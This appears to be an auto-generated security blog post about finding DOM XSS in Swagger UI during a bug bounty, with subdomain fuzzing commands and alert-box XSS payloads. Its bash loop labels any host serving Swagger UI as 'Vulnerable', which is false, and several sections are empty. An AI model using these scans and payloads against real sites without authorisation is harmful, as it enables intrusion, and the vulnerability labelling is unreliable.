Exploiting Swagger UI DOM XSS Vulnerabilities: A Bug Bounty Success Story

By /

Listen to this Post

Featured Image
Mustafa Adam Qamar El-Din recently uncovered two Swagger UI DOM XSS vulnerabilities, earning a well-deserved reward. Here’s a breakdown of his methodology, along with practical commands and techniques for replicating such findings.

Steps to Reproduce:

1. Subdomain Enumeration & Fuzzing

  • Used a custom wordlist to scan live subdomains:
    cat live-subs.txt | python3 dirsearch.py -i 200 -e php,bak,old,zip,tar.gz,txt,log,conf,json,asp,jsp,aspx,yml,yaml,rar --stdin
  • Discovered Swagger UI endpoints:
    – `https://api[.]example[.]com/swagger/index.html`
    – `https://prod[.]auth[.]example[.]com/swagger/index.html`

2. XSS Payload Execution

  • Leveraged payloads from this writeup.
  • Example payload:
    "><script>alert(document.domain)</script>

3. Custom Wordlist for Recon

You Should Know:

1. Advanced Fuzzing with FFUF

ffuf -w live-subs.txt -u https://FUZZ.example.com -mc 200 -o results.json

2. Swagger-Specific XSS Payloads

"onmouseover=alert(1)//

3. Automating with Bash

for sub in $(cat subs.txt); do curl -s "https://$sub/swagger/index.html" | grep -q "Swagger UI" && echo "Vulnerable: $sub"; done

4. Linux Tools for Recon

  • Subfinder (Subdomain discovery):
    subfinder -d example.com -o subs.txt
  • Gau (Fetching endpoints):
    gau example.com | grep "swagger"

5. Windows Command for Quick Checks

Invoke-WebRequest -Uri "https://api.example.com/swagger/index.html" | Select-String -Pattern "Swagger UI"

What Undercode Say:

Swagger UI remains a prime target for XSS due to improper input sanitization. Always test:
– URL parameters (?config=)
– API query inputs (/user/<payload>)
– JSON reflection in responses

Automate recon with Burp Suite, Nuclei, and custom scripts.

Prediction:

As API usage grows, Swagger UI XSS will remain a common low-hanging fruit. Expect more automation tools targeting misconfigured developer portals.

Expected Output:

  • Vulnerable Swagger UI endpoints
  • Successful XSS execution
  • Bug bounty report submission

Relevant URLs:

IT/Security Reporter URL:

Reported By: Wadgamaraldeen Tips – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass βœ…

Join Our Cyber World:

πŸ’¬ Whatsapp | πŸ’¬ Telegram

Related Posts: